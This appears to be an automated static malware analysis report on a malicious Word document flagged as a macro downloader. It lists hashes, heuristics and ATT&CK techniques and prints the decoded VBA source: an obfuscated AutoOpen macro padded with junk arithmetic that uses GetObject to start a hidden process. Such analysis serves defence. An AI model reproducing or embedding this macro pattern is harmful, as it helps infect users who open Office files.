Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0e77a3179a5714fe…

MALICIOUS

Office (OLE)

Size: 151.1 KB
Created: 2019-03-20 20:39:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 95254d9838d6b1399048f85c757cf4f1
SHA-1: 3211d67d5f0e0e16ae112dc0bd2c95ede81d4f00
SHA-256: 0e77a3179a5714febef6ca5fbfbcd5fb14efabe0d07cf58680716f80880129fc
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The sample is a Microsoft Office document containing a VBA macro with an autoopen subroutine. This macro utilizes a GetObject call, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Downloader.Sagent-6904393-0' strongly suggests the macro's purpose is to download and execute a secondary payload. The VBA code is heavily obfuscated, making a precise analysis of its execution flow difficult, but the presence of autoexecuting macros and the downloader heuristic are clear indicators of malicious intent.

Heuristics 7

  • ClamAV: Doc.Downloader.Sagent-6904393-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sagent-6904393-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11633 bytes
SHA-256: c417386c50c5bf2545c47b0b66774fee74533a2348fba655310e3a303eccda74
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iUCAZAC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KDUAAABU"
Attribute VB_Base = "0{D828A9C2-6855-4194-AF8E-C580C8FAFCFB}{9F05061C-A97D-4D02-83CB-C5E0B759E425}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pAB4wQk"
Sub autoopen()
On Error Resume Next
   If tGCQB1 = v_AAQQDQ Then
      FAAAAAA = 717647646 * CInt(233297471) / _
658828767 + Sqr(207313192) * 745415091 / CInt(312963833) * (844548510 * 465056738)
      jZAwAB = (173316002 - Asc(YAUXAZwG) / MAAGABAA / 613300625 + _
pGwQ_x / Fix(195876274 + Log(CABGAU * Sgn(8622865) + kQAGGD1B / CSng(839957413))))
End If
   If ZGXUDAA = sx4UoBB Then
      WCAXAAk = 826349753 * CInt(520485790) / _
444846816 + Sqr(201627611) * 494557910 / CInt(810542288) * (770000877 * 651041284)
      bGA1AA = (607811369 - Asc(PCAAADB) / nA1DBBQ1 / 1749335 + _
CwC1BAXA / Fix(42706618 + Log(QBAAXZ * Sgn(896449898) + iUxoGA / CSng(160651301))))
End If
Set dAQAAAkk = GetObject(KDUAAABU.RAAwAUA)
   If iBxZAZ1Q = wBAAAkQ Then
      YAUADx = 721564642 * CInt(124795841) / _
170569118 + Sqr(603655858) * 119255611 / CInt(668239378) * (80036417 * 682567044)
      VcUAw44 = (66576522 - Asc(lB4xUDAw) / zwGZAD / 116988703 + _
kBokZAk / Fix(804695490 + Log(uAAXA1BQ * Sgn(152929563) + nBCcZXAw / CSng(495692849))))
End If
   If WxZAAZ = dkDZckXA Then
      PXAAAA = 823422638 * CInt(608060300) / _
935010364 + Sqr(433062525) * 819715303 / CInt(226955619) * (813395985 * 603633177)
      KDA4DAC = (545714479 - Asc(iUXoDG) / qk1Z44DA / 567750152 + _
S1QAAA / Fix(116103032 + Log(qAAXDkAU * Sgn(419386701) + HBAQ1A / CSng(702477642))))
End If
dAQAAAkk.ShowWindow = 624343 - 624343
   If IZUZA4 = jACBDkDc Then
      jAABCABc = 315002202 * CInt(17448769) / _
641727752 + Sqr(639634465) * 277225128 / CInt(636151779) * (108771433 * 227949140)
      X4A_DA = (169290908 - Asc(EA1A4AC) / lBBAGC1 / 557148344 + _
jA_ABkQA / Fix(547372725 + Log(GUA4AAxw * Sgn(51560902) + XGZcGA / CSng(918587398))))
End If
   If GXXABo = RADxAG Then
      jBAxQDo = 415029796 * CInt(458128909) / _
601151473 + Sqr(743114132) * 735950754 / CInt(541986983) * (985751184 * 859003777)
      LAxAXA = (941226414 - Asc(hAQAkwB) / HDoUxA / 760500975 + _
G_GDXw / Fix(877536082 + Log(ww_BoC_A * Sgn(808973140) + YQoxoU / CSng(76952230))))
End If
GetObject(KDUAAABU.zoAAGoAG). _
Create# jUDxA4G1 + KDUAAABU.AABZGAQ + c1DA1G + KDUAAABU.TAAUQX + zC4QoQ + KDUAAABU.IA4AcUQk + iAZ_AAx, rDBAAQ, dAQAAAkk, fZAACAXA
   If VQXc4B = N4cA1CwU Then
      iZ_AXUQ = 15510243 * CInt(610907503) / _
128885924 + Sqr(966049709) * 341295882 / CInt(333658196) * (855111941 * 446073890)
      KcXC4UAA = (814988864 - Asc(ZBA4ADAw) / SQwBwAxA / 254941050 + _
pwxUAB / Fix(962703864 + Log(FD1cQQ * Sgn(64483640) + NAXCABw / CSng(980357467))))
End If
   If iGA41A4Q = bDoBAD Then
      FG1DAD = 46651314 * CInt(799849451) / _
690851463 + Sqr(742936995) * 546528798 / CInt(327037674) * (590726028 * 656524057)
      i_AZxAU = (65743051 - Asc(r_4cUZU) / YU1wGQ_ / 632529619 + _
EQooAA / Fix(684949678 + Log(GCCAQB * Sgn(253356467) + jxx4Ak / CSng(707364670))))
End If
End Sub


' Processing file: /opt/analyzer/scan_staging/612c2d72fcb640f48dc6ad3853325a50.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iUCAZAC - 1105 bytes
' Macros/VBA/KDUAAABU - 1158 bytes
' Macros/VBA/pAB4wQk - 5227 bytes
' Line #0:
' 	FuncDefn (Sub pAB4wQk())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Ld autoopen 
' 	Ld tGCQB1 
' 	Eq 
' 	IfBlock 
' Line #3:
' 	LineCont 0x0004 09 00 00 00
' 	LitDI4 0x6F1E 0x2AC6 
' 	LitDI4 0xD63F 0x0DE7 
' 	Coerce (Int) 
' 	Mul 
' 	LitDI4 0x
... (truncated)